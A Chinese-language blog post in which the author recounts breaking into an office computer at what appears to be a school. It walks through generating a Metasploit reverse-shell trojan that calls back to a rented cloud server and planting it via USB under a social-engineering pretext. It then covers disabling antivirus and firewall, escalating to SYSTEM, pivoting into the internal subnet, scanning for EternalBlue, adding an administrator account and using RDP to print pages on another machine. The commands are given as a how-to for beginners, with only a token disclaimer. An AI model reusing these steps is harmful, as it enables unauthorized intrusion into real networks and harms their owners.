使用msf+社會工程學(xué) 提權(quán)內(nèi)網(wǎng)并留下紀(jì)念

本人菜雞一枚,寫這篇文章只為了記錄一下我的過程以及替其他小白提供一點幫助吧

在經(jīng)歷了研究msf半個月的時間內(nèi),了解到msf的確是內(nèi)網(wǎng)中的一把利劍但遺憾的是當(dāng)時試過使用Msf+Ngork內(nèi)網(wǎng)映射嘗試外網(wǎng)環(huán)境反彈內(nèi)網(wǎng)的shell,不知道為什么經(jīng)常中斷,就不了了之了,但是我并沒有放棄,于是嘛~~

氪金!玄不救非,氪不改命

于是我就買了一個騰訊云服務(wù)器,

在控制臺把公網(wǎng)ip轉(zhuǎn)換為彈性

在控制臺把公網(wǎng)ip轉(zhuǎn)換為彈性

在控制臺把公網(wǎng)ip轉(zhuǎn)換為彈性

重要的事情說三遍,不然是無法反彈shell的

學(xué)生價很便宜,推薦購買,我搭建了一個ubuntu系統(tǒng),

在簡單的apt-get update apt-get upgrade ........之后


使用katoolin安裝了msf


這里是katoolin的下載地址git clone https://github.com/LionSec/katoolin.git

圖片發(fā)自簡書App

1 然后回車 再1 就成功添加了kali的源


再apt-get install metasploit-framework

就正常安裝msf5了

圖片發(fā)自簡書App


然后就先使用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(你的服務(wù)器公網(wǎng)IP) LPORT=(隨便一個端口,例如我的999) -f exe -o /root/1.exe?

這個命令生成一個木馬,木馬路徑在/root/文件下

lhost就是你的公網(wǎng)IP,lport就是你的監(jiān)聽端口


然后我們啟動msf,命令 msfconsole

圖片發(fā)自簡書App

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 172.105.0.9 (這里是服務(wù)器私網(wǎng)IP!)

set LPORT 999 (這里是監(jiān)聽端口,和木馬設(shè)置的一樣就ok)

exploit 開始監(jiān)聽,等待對方打開文件

圖片發(fā)自簡書App


接下來因每個人目的不同,我的目標(biāo)機器是辦公樓的一臺主機,里面全是老師和一些學(xué)生會的人,于是我就裝成學(xué)生會去打印文件???,于是等了一會兒,終于插上U盤,復(fù)制文件到啟動項,以備不時之需,哦豁,360馬上給我刪了,沒辦法,我是個菜雞,試過免殺也沒過去,一不做二不休,直接關(guān)了防火墻和退出360,,拿下shell,開溜。。,,(雖然附近人看著我怪怪的)然后成功反彈到shell,(因為我已經(jīng)成功的做了想做的事情,刪掉了木馬,后面就沒有截圖了)

圖片發(fā)自簡書App


監(jiān)聽成功,獲得meterpreter。

getuid,是查看主機名

我當(dāng)時只是一個administrator,并不是最高的system,于是就用

ps 查看進程id

找到system的進程,

(因為我這邊的system進程id為1022,所以我就轉(zhuǎn)移到了1022)

migrate 1022

再getuid 查看


就提升到了system權(quán)限了

然后 run get_local_subnets

獲取目標(biāo)地址網(wǎng)段

我這邊為192.168.15.0/255.255.0.0


于是直接添加去往目標(biāo)網(wǎng)段的路由

run autoroute -s 192.168.15.0/255.255.0.0

再使用

run autoroute -p

我已經(jīng)成功添加一條路由

192.168.15.0 255.255.255.0

background

可以返回后臺,并保存會話

使用sessions -i 查看會話

sessions -i (會話id)連接會話

因為我們現(xiàn)在已經(jīng)在192.168.15.0/24這個網(wǎng)段下,所以可以使用nmap或其他漏洞掃描工具

掃描內(nèi)網(wǎng)主機漏洞

使用“永恒之藍(lán)”漏洞掃描模塊進行內(nèi)網(wǎng)所有主機進行漏洞掃描。

use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.15.0/24

set threads 50

run


結(jié)果我這邊發(fā)現(xiàn)

192.168.15.3

192.168.15.245兩臺機器存在永恒之藍(lán)漏洞

圖片發(fā)自簡書App


于是就草草寫了一個doc,待會有大作用

因為我的后臺會話id為1

所以我直接sessions -i 1

連接shell,

輸入

shell

可以直接在cmd下添加用戶

net user test test123 /add

net localgroup administrators test /add

成功將用戶test加冕為王,此時

exit

返回meterpreter會話

upload /root/test.doc C:\

上傳我的doc到主機c盤根目錄下

圖片發(fā)自簡書App

圖片發(fā)自簡書App

然后使用

run getgui -e? 開啟目標(biāo)主機3389

不知道為什么好像不行,就用cmd打開了

圖片發(fā)自簡書App

然后因為我們還在同一個網(wǎng)段下面,直接

apt install rdesktop

安裝rdesktop,

然后就直接rdesktop

rdesktop -u test -p test123 -g 1024*720 192.168.15.3

連接上目標(biāo)主機

打開我們c盤下的test.doc

打開后,選擇打印,emmmm,一百張~

圖片發(fā)自簡書App

然后刪木馬,清日志,(我好像沒清。。就跑了。。)

圖片發(fā)自簡書App


 完美,現(xiàn)在,已經(jīng)成功實現(xiàn)了很多人曾經(jīng)的那個中二夢。~~,

有人敲門,我的快遞可能到了,告辭

轉(zhuǎn)載請注明出處,請勿用于違法犯罪,開心就好,一切后果概不負(fù)責(zé),

tail tail

圖片發(fā)自簡書App
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容